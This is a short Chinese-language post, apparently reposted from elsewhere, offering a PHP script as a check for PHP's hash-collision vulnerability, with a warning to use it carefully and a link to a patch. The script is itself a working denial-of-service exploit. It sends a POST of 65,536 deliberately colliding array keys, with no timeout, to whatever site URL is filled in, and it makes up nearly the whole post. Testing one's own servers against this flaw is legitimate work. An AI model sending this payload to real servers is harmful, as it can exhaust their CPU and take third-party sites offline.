下面是一段从互联网上转载来的PHP代码,可以用来检测服务器上的PHP是否存在Hash漏洞。
<?php $size = pow(2, 16); $array = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.xxx.com/index.php"); //修改成你的网站域名 for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) { #$array[$key] = 0; $argument.="a[".$key."]=0&"; } curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, '0'); curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)'); $return['result'] = curl_exec($ch); $return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); ?>
上面的代码请谨慎使用,同时提醒大家尽快修补漏洞,相关的方法请参见:http://www.sunbloger.com/article/224.html